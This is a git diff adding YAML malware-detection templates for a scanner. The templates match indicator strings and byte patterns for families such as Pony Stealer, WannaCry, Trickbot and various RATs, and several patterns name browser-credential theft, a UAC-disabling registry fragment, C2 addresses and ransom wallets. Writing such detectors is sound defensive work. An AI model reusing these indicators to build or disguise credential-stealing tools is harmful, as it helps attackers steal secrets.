b/file/malware/pony-stealer-malware.yaml new file mode 100644 index 0000000000..9526bab694 --- /dev/null +++ b/file/malware/pony-stealer-malware.yaml @@ -0,0 +1,29 @@ +id: pony-stealer-malware + +info: + name: Windows Pony Stealer Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_pony_stealer.yara + tags: malware,file,pony,stealer +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "signons.sqlite" + - "signons.txt" + - "signons2.txt" + - "signons3.txt" + - "WininetCacheCredentials" + - "moz_logins" + - "encryptedPassword" + - "FlashFXP" + - "BulletProof" + - "CuteFTP" + condition: and + case-insensitive: true + +# digest: 4a0a00473045022051137ec4287733be40855295f4df9e5a0c89085ddbc6af52449fd86bb78eeef9022100d0280cb88ff244d8e3753e6f5e9bf2ed1fd723610d42781b02c530800a711e38:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/powerware-malware.yaml b/file/malware/powerware-malware.yaml new file mode 100644 index 0000000000..e878828348 --- /dev/null +++ b/file/malware/powerware-malware.yaml @@ -0,0 +1,21 @@ +id: powerware-malware + +info: + name: PowerWare Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara + tags: malware,file,powerware +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "ScriptRunner.dll" + - "ScriptRunner.pdb" + - "fixed.ps1" + condition: and + +# digest: 4a0a0047304502202f84f482f615237f07e7c108cd61c226f08b6b515c6736d3e88fb43de8e7c025022100bcd4078138a73ac29b4c59b0b58365b09396c0db1a124c04fc08d86788f1e52a:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/pubsab-malware.yaml b/file/malware/pubsab-malware.yaml new file mode 100644 index 0000000000..0cba7ee8aa --- /dev/null +++ b/file/malware/pubsab-malware.yaml @@ -0,0 +1,27 @@ +id: pubsab-malware + +info: + name: PubSab Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PubSab.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "_deamon_init" + - "com.apple.PubSabAgent" + - "/tmp/screen.jpeg" + condition: or + + - type: binary + binary: + - "6B45E43789CA29C28955E4" + +# digest: 4b0a00483046022100e35038a4704449057d8c527208921acaf54a002d1f882572781ee2d32875aa29022100bbafab64c56d8a6a650628069a2ca792f78859923ff371f0ad3f0c18fd3d1215:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/punisher-malware.yaml b/file/malware/punisher-malware.yaml new file mode 100644 index 0000000000..78d3c5b6c3 --- /dev/null +++ b/file/malware/punisher-malware.yaml @@ -0,0 +1,31 @@ +id: punisher-malware + +info: + name: Punisher Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "abccba" + - "SpyTheSpy" + - "wireshark" + - "apateDNS" + - "abccbaDanabccb" + condition: and + + - type: binary + binary: + - "5C006800660068002E007600620073" + - "5C00730063002E007600620073" + condition: and + +# digest: 4a0a004730450220680377c6a6c5163e263077764a7ef6300edd75e57a09766f330f652bd1a4a0110221008675d1a4b089ae3b37454d41799ea67eefcadee002720a2e2e561d2eab289adf:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/pypi-malware.yaml b/file/malware/pypi-malware.yaml new file mode 100644 index 0000000000..f1e0d53b1e --- /dev/null +++ b/file/malware/pypi-malware.yaml @@ -0,0 +1,23 @@ +id: pypi-malware + +info: + name: Fake PyPI Malware - Detect + author: daffainfo + severity: info + reference: + - http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PyPI.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "# Welcome Here! :)" + - "# just toy, no harm :)" + - "[0x76,0x21,0xfe,0xcc,0xee]" + condition: and + +# digest: 490a0046304402206b82fc613c832c971dacca4ebef281e7665c9f1f006f44a24c48296dae1a9b8c02206f9aea9c19d940aac173806aa1726900fb0fd68078dc61ab6496191f35d52fa5:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/pythorat-malware.yaml b/file/malware/pythorat-malware.yaml new file mode 100644 index 0000000000..6233a01198 --- /dev/null +++ b/file/malware/pythorat-malware.yaml @@ -0,0 +1,26 @@ +id: pythorat-malware + +info: + name: PythoRAT Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "TKeylogger" + - "uFileTransfer" + - "TTDownload" + - "SETTINGS" + - "Unknown" + - "#@#@#" + - "PluginData" + - "OnPluginMessage" + condition: and + +# digest: 4b0a004830460221009093ec1809d86d670fb071055cb0fddd67efae877cc74470a43365766d82b6a902210092ffcc0109b2a0d3d3133d1b1856cfb208b8dc90f531a363d9ddd4d527bdc72c:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/qrat-malware.yaml b/file/malware/qrat-malware.yaml new file mode 100644 index 0000000000..83567ec4ff --- /dev/null +++ b/file/malware/qrat-malware.yaml @@ -0,0 +1,50 @@ +id: qrat-malware + +info: + name: QRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "quaverse/crypter" + - "Qrypt.class" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + part: raw + words: + - "e-data" + - "Qrypt.class" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + words: + - "e-data" + - "quaverse/crypter" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + part: raw + words: + - "e-data" + - "quaverse/crypter" + - "Qrypt.class" + - "URLConnection.class" + condition: and + +# digest: 4b0a00483046022100fedf267a13b375a9f38379878ddeb76727feb11d239ac2e0e6c9549acf3dbbde022100bb74b2c94ef235bbd7642ad6c930924f9e6138f3f60c219a7d39018eb62a5dcc:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/satana-dropper-malware.yaml b/file/malware/satana-dropper-malware.yaml new file mode 100644 index 0000000000..78571beb96 --- /dev/null +++ b/file/malware/satana-dropper-malware.yaml @@ -0,0 +1,20 @@ +id: satana-dropper-malware + +info: + name: Satana Dropper Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Satana.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "25732D547279457863657074" + - "643A5C6C626574776D77795C75696A657571706C667775622E706462" + - "71666E7476746862" + condition: and + +# digest: 4a0a0047304502205f28aaef12ecdda0670971694f70cf1e8a32caa2f72bc8ff0e7e4ad72ccc82ee02210087f065cda4b2fa25f7b687dc03332a6be7a6bed793f097a1b1507f4e653dc554:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/satana-malware.yaml b/file/malware/satana-malware.yaml new file mode 100644 index 0000000000..57821d2186 --- /dev/null +++ b/file/malware/satana-malware.yaml @@ -0,0 +1,29 @@ +id: satana-malware + +info: + name: Satana Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: binary + binary: + - "210073006100740061006E00610021002E0074007800740000" + - "456E756D4C6F63616C526573" + - "574E65744F70656E456E756D5700" + - "21534154414E4121" + condition: and + + - type: binary + binary: + - "7467777975677771" + - "537776776E6775" + condition: or + +# digest: 4a0a00473045022100e0d617ca6bbe36bf2a8bd9c875e1fbf40332d5e385abe1e70cfa19ccbc96056f02203da10e9fd106a91ded24ea8f1a8fa96970b8ea2a902ee57372afa80d486d303a:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/shimrat-malware.yaml b/file/malware/shimrat-malware.yaml new file mode 100644 index 0000000000..c681761f3a --- /dev/null +++ b/file/malware/shimrat-malware.yaml @@ -0,0 +1,43 @@ +id: shimrat-malware + +info: + name: ShimRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - ".dll" + - ".dat" + - "QWERTYUIOPLKJHG" + - "MNBVCXZLKJHGFDS" + condition: and + + - type: word + part: raw + words: + - "Data$$00" + - "Data$$01%c%sData" + condition: and + + - type: word + part: raw + words: + - "ping localhost -n 9 /c %s > nul" + - "Demo" + - "Win32App" + - "COMSPEC" + - "ShimMain" + - "NotifyShims" + - "GetHookAPIs" + condition: and + +# digest: 4b0a004830460221009da26e19a00937b0d0349977f9fec211af3d556f9f893e2867131c0abd215ddf0221008601cdf41e002a97fba4584ad7e7c4df833a7b6f67cfa3bde6e2f3c5c87af44d:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/shimratreporter-malware.yaml b/file/malware/shimratreporter-malware.yaml new file mode 100644 index 0000000000..21d18f3f7a --- /dev/null +++ b/file/malware/shimratreporter-malware.yaml @@ -0,0 +1,30 @@ +id: shimratreporter-malware + +info: + name: ShimRatReporter Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "IP-INFO" + - "Network-INFO" + - "OS-INFO" + - "Process-INFO" + - "Browser-INFO" + - "QueryUser-INFO" + - "Users-INFO" + - "Software-INFO" + - "%02X-%02X-%02X-%02X-%02X-%02X" + - "(from environment) = %s" + - "NetUserEnum" + - "GetNetworkParams" + condition: and + +# digest: 4b0a004830460221008a0d2f7db3a9984378cf10f44fa78b4160a493e9e3b8bd7c6ae0ae600b0777cb022100b36b3c25e9b677e7c62fc45315d79df0f7157479630f3e871854cd7557538f54:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/sigma-malware.yaml b/file/malware/sigma-malware.yaml new file mode 100644 index 0000000000..3ce63a41cf --- /dev/null +++ b/file/malware/sigma-malware.yaml @@ -0,0 +1,27 @@ +id: sigma-malware + +info: + name: Sigma Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Sigma.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - ".php?" + - "uid=" + - "&uname=" + - "&os=" + - "&pcname=" + - "&total=" + - "&country=" + - "&network=" + - "&subid=" + condition: and + +# digest: 4a0a00473045022100923b2707a03e5401842cf8f3978904badc2e191971659a40e69614409a013d1302201e8ae19646d6ba3d6a7ec2c3c227de5b26f3d888fa7d454f5566994cdb44b7a0:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/smallnet-malware.yaml b/file/malware/smallnet-malware.yaml new file mode 100644 index 0000000000..8c015f0faa --- /dev/null +++ b/file/malware/smallnet-malware.yaml @@ -0,0 +1,28 @@ +id: smallnet-malware + +info: + name: SmallNet Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "!!<3SAFIA<3!!" + - "!!ElMattadorDz!!" + condition: or + + - type: word + part: raw + words: + - "stub_2.Properties" + - "stub.exe" + - "get_CurrentDomain" + condition: and + +# digest: 4a0a00473045022051a244fc74e16f5e6862e07462f37cf639913cc7ee40223ad0d271197f1d028e022100ace9ba900210c44afc93693c5aeb0b618a2d793d6a2dcd761b5f85d9b5944f57:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/snake-malware.yaml b/file/malware/snake-malware.yaml new file mode 100644 index 0000000000..34bd9cae4c --- /dev/null +++ b/file/malware/snake-malware.yaml @@ -0,0 +1,26 @@ +id: snake-malware + +info: + name: Snake Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Snake.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "Go build ID: \"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\"" + + - type: binary + binary: + - "89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF" + - "648B0D140000008B89000000003B61080F863801000083EC3CE8321AF3FF8D7C242889E6E825EAF0FF8B44242C8B4C242889C2C1E81FC1E01F85C00F84FC000000D1E289CBC1E91F09D189DAD1E3C1EB1F89CDD1E109D989CB81C1807FB1D7C1ED1F81C3807FB1D783D50D89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF31C0EB79894424208B4C24408D14C18B1A895C24248B52048954241CC7042405000000E848FEFFFF8B4424088B4C2404C70424000000008B542424895424048B5C241C895C2408894C240C89442410E8ECDDEFFF8B4424188B4C2414894C24088944240C8B4424248904248B44241C89442404E868BBF3FF8B44242040" + condition: and + +# digest: 4a0a00473045022034639cbc3aaa73d91005d132d39c09dd9f3c358777b4ce9c7eb0d08828404ed90221008ef9c8229ed2c014a5c70a2cfd5e8b5ca671e2bf8f50aad9646dd781650bd82d:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/sub7nation-malware.yaml b/file/malware/sub7nation-malware.yaml new file mode 100644 index 0000000000..bd4416419d --- /dev/null +++ b/file/malware/sub7nation-malware.yaml @@ -0,0 +1,31 @@ +id: sub7nation-malware + +info: + name: Sub7Nation Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "EnableLUA /t REG_DWORD /d 0 /f" + - "*A01*" + - "*A02*" + - "*A03*" + - "*A04*" + - "*A05*" + - "*A06*" + - "#@#@#" + - "HostSettings" + - "sevane.tmp" + - "cmd_.bat" + - "a2b7c3d7e4" + - "cmd.dll" + condition: and + +# digest: 4b0a00483046022100fb2764917f165bba45b38510991be14ee4b76e66856cce974eb53ff743f7dd2f022100bb16838b1f79589fb2ee28e8a48a8b56421df874e5bd2d1c2e301bdc7fddb183:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/t5000-malware.yaml b/file/malware/t5000-malware.yaml new file mode 100644 index 0000000000..f82adff602 --- /dev/null +++ b/file/malware/t5000-malware.yaml @@ -0,0 +1,32 @@ +id: t5000-malware + +info: + name: T5000 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_T5000.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "_tmpR.vbs" + - "_tmpg.vbs" + - "Dtl.dat" + - "3C6FB3CA-69B1-454f-8B2F-BD157762810E" + - "EED5CA6C-9958-4611-B7A7-1238F2E1B17E" + - "8A8FF8AD-D1DE-4cef-B87C-82627677662E" + - "43EE34A9-9063-4d2c-AACD-F5C62B849089" + - "A8859547-C62D-4e8b-A82D-BE1479C684C9" + - "A59CF429-D0DD-4207-88A1-04090680F714" + - "utd_CE31" + - "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb" + - "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb" + - "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb" + - "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb" + condition: or + +# digest: 4b0a00483046022100c4d719f89ac4726441df42b1d0068c3cf398983de9ec48ebcc901802ff3a93d402210085f58b14a245c974e033ec00eb4038cb784244a023a72c86ad2d6b764d2d9c6a:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/tedroo-malware.yaml b/file/malware/tedroo-malware.yaml new file mode 100644 index 0000000000..a9b8209792 --- /dev/null +++ b/file/malware/tedroo-malware.yaml @@ -0,0 +1,19 @@ +id: tedroo-malware + +info: + name: Tedroo Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Tedroo.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "257325732E657865" + - "5F6C6F672E747874" + condition: and + +# digest: 4b0a00483046022100c0edf2315be868e1c4cd22d05c74bee3a744b620c5b4c30312b6341c77b65e73022100a33de0b6394c6b823a31d816e69467ecd5740b9272d4afb53b8f8a1be5bb4238:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/terminator-malware.yaml b/file/malware/terminator-malware.yaml new file mode 100644 index 0000000000..d95464f22c --- /dev/null +++ b/file/malware/terminator-malware.yaml @@ -0,0 +1,20 @@ +id: terminator-malware + +info: + name: Terminator Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Terminator.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "Accelorator" + - "12356" + condition: and + +# digest: 490a0046304402206fb3e105ea9cabbc826f3dcdd7109ad096bb1916aa0b2413019a80d6cc785650022016d325b3ea18206c6f3bf1e8e1b214c79328a6251572d7d70ae42c1b90e827ee:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/teslacrypt-malware.yaml b/file/malware/teslacrypt-malware.yaml new file mode 100644 index 0000000000..a96eb1defa --- /dev/null +++ b/file/malware/teslacrypt-malware.yaml @@ -0,0 +1,17 @@ +id: teslacrypt-malware + +info: + name: TeslaCrypt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_TeslaCrypt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "4E6F7720697427732025493A254D25702E00000076616C2069732025640A0000" + +# digest: 4a0a00473045022100cc5505ef331e458b96f5b74ed97eab506cedf912eb01039ce9b817fddcc960e502202306bebd061c483b1e14f1edab9a43258e9788023188fb37f96bd8d214088d0d:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/tox-malware.yaml b/file/malware/tox-malware.yaml new file mode 100644 index 0000000000..4571ec8232 --- /dev/null +++ b/file/malware/tox-malware.yaml @@ -0,0 +1,36 @@ +id: tox-malware + +info: + name: Tox Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Tox.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<" + condition: and + + - type: word + part: raw + words: + - "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<" + condition: and + +# digest: 490a004630440220145a23c07dceab65162628617ab1d5f68f98681d263bdd753bbea601d475a39302206cfc0ef865f74a4b2ad37e3b5e0a5a4b6d12eeb49ddcbb2301b47f5d544072f0:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/treasurehunt-malware.yaml b/file/malware/treasurehunt-malware.yaml new file mode 100644 index 0000000000..461942a7bf --- /dev/null +++ b/file/malware/treasurehunt-malware.yaml @@ -0,0 +1,23 @@ +id: treasurehunt-malware + +info: + name: Trickbot Malware - Detect + author: daffainfo + severity: info + reference: + - http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TreasureHunt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "treasureHunter.pdb" + - "jucheck" + - "cmdLineDecrypted" + condition: and + +# digest: 490a00463044022066ec12589d804e6cdd0ae2549ddb57602345462fd6dee2a09550b9e9a4108068022002ae9874acc7eb50603b2ab47d0c2800183c391cd71b5dbb08f43d95ba4cab26:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/trickbot-malware.yaml b/file/malware/trickbot-malware.yaml new file mode 100644 index 0000000000..d892818ce1 --- /dev/null +++ b/file/malware/trickbot-malware.yaml @@ -0,0 +1,23 @@ +id: trickbot-malware + +info: + name: Trickbot Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TrickBot.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "moduleconfig" + - "Start" + - "Control" + - "FreeBuffer" + - "Release" + condition: and + +# digest: 4a0a004730450220707c3242eb05a2aba17d8a46be0d45921b92677ff74100c7af12a0778cb30dcd022100cb971233ce240fa01df92e4de1552ff5b06cdd9bd1eeeabab7fb7124be816da1:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/trumpbot-malware.yaml b/file/malware/trumpbot-malware.yaml new file mode 100644 index 0000000000..6409acc81a --- /dev/null +++ b/file/malware/trumpbot-malware.yaml @@ -0,0 +1,20 @@ +id: trumpbot-malware + +info: + name: TrumpBot Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Trumpbot.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "trumpisdaddy" + - "198.50.154.188" + condition: and + +# digest: 490a00463044022077686f6a132d9f6022811b59ada2f6e32dc4c3847f849c6c62578d03d11b0fa002202ed35d1b92c92e2fc792b216642c08c92cc9e1a52032828ce2df303909b75f03:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/universal-1337-malware.yaml b/file/malware/universal-1337-malware.yaml new file mode 100644 index 0000000000..d0db418c90 --- /dev/null +++ b/file/malware/universal-1337-malware.yaml @@ -0,0 +1,27 @@ +id: universal-1337-malware + +info: + name: Universal 1337 Stealer Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Stealer.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "2A5B532D502D4C2D492D545D2A" + - "2A5B482D452D522D455D2A" + condition: and + + - type: binary + binary: + - "4654507E" + - "7E317E317E307E30" + condition: and + +# digest: 490a004630440220397ce50e31990f7aaaf02be33afd37aff4a51d93c9940d61c39cc589194a78f102207ace42ecf66077fe30a11e59a5701dd4cbc00744153c557a103eed243e082eec:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/unrecom-malware.yaml b/file/malware/unrecom-malware.yaml new file mode 100644 index 0000000000..3a87a10b3c --- /dev/null +++ b/file/malware/unrecom-malware.yaml @@ -0,0 +1,23 @@ +id: unrecom-malware + +info: + name: Unrecom Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "META-INF" + - "load/ID" + - "load/JarMain.class" + - "load/MANIFEST.MF" + - "plugins/UnrecomServer.class" + condition: and + +# digest: 490a00463044022061c7bc50067c54621333714d9eb670cd63a90b46af0b387b09efe0d4c7c4068b02203c84c06d9f54cbc723c12be9e4c7960f2eca1c6f126492c098d2b2e9a78b7465:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/urausy-malware.yaml b/file/malware/urausy-malware.yaml new file mode 100644 index 0000000000..382bcbedc7 --- /dev/null +++ b/file/malware/urausy-malware.yaml @@ -0,0 +1,24 @@ +id: urausy-malware + +info: + name: Urausy Skype Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Urausy.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "skype.dat" + - "skype.ini" + - "CreateWindow" + - "YIWEFHIWQ" + - "CreateDesktop" + - "MyDesktop" + condition: and + +# digest: 4a0a0047304502207b3b598cd852ee0690d9b13cc9b12860694de99a33231362605d694396de456f022100da377937679673c9a06f1a8c9a4b804226d71c2d0e28eae0a7702f0f2dec74cc:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/vertex-malware.yaml b/file/malware/vertex-malware.yaml new file mode 100644 index 0000000000..edd47e61f5 --- /dev/null +++ b/file/malware/vertex-malware.yaml @@ -0,0 +1,26 @@ +id: vertex-malware + +info: + name: Vertex Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "DEFPATH" + - "HKNAME" + - "HPORT" + - "INSTALL" + - "IPATH" + - "MUTEX" + - "PANELPATH" + - "ROOTURL" + condition: and + +# digest: 4a0a00473045022100cade2b78f128db265e8c5db7004a11d4c7062226687a418ae25d172870f626ec02202aabc9b4786f780667e3863bbe8561528edfd2b957d7ac9b052701e5d5812679:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/virusrat-malware.yaml b/file/malware/virusrat-malware.yaml new file mode 100644 index 0000000000..094f96b0df --- /dev/null +++ b/file/malware/virusrat-malware.yaml @@ -0,0 +1,30 @@ +id: virusrat-malware + +info: + name: VirusRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "virustotal" + - "virusscan" + - "abccba" + - "pronoip" + - "streamWebcam" + - "DOMAIN_PASSWORD" + - "Stub.Form1.resources" + - "ftp://{0}@{1}" + - "SELECT * FROM moz_logins" + - "SELECT * FROM moz_disabledHosts" + - "DynDNS\\Updater\\config.dyndns" + - "|BawaneH|" + condition: and + +# digest: 490a00463044022061bcb47a0873b0588f265a7e601cd05b6bb37ad8e063e592fdd7d903ad4cc0be02202d8867290f2fdd9ab8efecfb3d5fedc3cadfc2dafc41e8a2adef2fbb43b83e1d:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/wabot-malware.yaml b/file/malware/wabot-malware.yaml new file mode 100644 index 0000000000..f5f7c36535 --- /dev/null +++ b/file/malware/wabot-malware.yaml @@ -0,0 +1,19 @@ +id: wabot-malware + +info: + name: Warp Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Wabot.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "433A5C6D6172696A75616E612E747874" + - "7349524334" + condition: and + +# digest: 490a00463044022059b384672714a4093b8f5cfd73c51f240d9ec565c0df7fedd17166c7d2168368022061a1fd229442ae14c76593442382c14c59b2c8a5e27f91ca120691ed31497237:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/wannacry-malware.yaml b/file/malware/wannacry-malware.yaml new file mode 100644 index 0000000000..22bdda59bb --- /dev/null +++ b/file/malware/wannacry-malware.yaml @@ -0,0 +1,33 @@ +id: wannacry-malware + +info: + name: WannaCry Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_wannacry.yara + tags: malware,file,wannacry +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "msg/m_chinese" + - ".wnry" + - "attrib +h" + condition: and + + - type: word + part: raw + words: + - "WNcry@2ol7" + - "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" + - "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" + - "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" + - "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" + condition: or + +# digest: 490a00463044022075f35e75c9f2832f30654ca6b3c0a8ba30466e117d4c4b8f42baa4b0a9ae5a3202203804e16360e6ec92468528804f0e3e34058c9df44c1c1ecc8269b7cfcc84dbc2:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml new file mode 100644 index 0000000000..bcf2e9b53a --- /dev/null +++ b/file/malware/warp-malware.yaml @@ -0,0 +1,27 @@ +id: warp-malware + +info: + name: Warp Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Warp.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "/2011/n325423.shtml?" + - "wyle" + - "\\~ISUN32.EXE" + condition: or + + - type: binary + binary: + - "80382B7503C6002D80382F7503C6005F" + +# digest: 4a0a00473045022100841926e56850756403c4d4035ecc9b7d08e8e0642b013dea6df56a912a82b6c402202ee68a5dcea7ca1703fe713ad85fe77313fc855e95a50ff72976487416ef564c:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/xhide-malware.yaml b/file/malware/xhide-malware.yaml new file mode 100644 index 0000000000..e27c26f26b --- /dev/null +++ b/file/malware/xhide-malware.yaml @@ -0,0 +1,20 @@ +id: xhide-malware + +info: + name: xHide Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XHide.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'XHide - Process Faker' + - 'Fakename: %s PidNum: %d' + condition: and + +# digest: 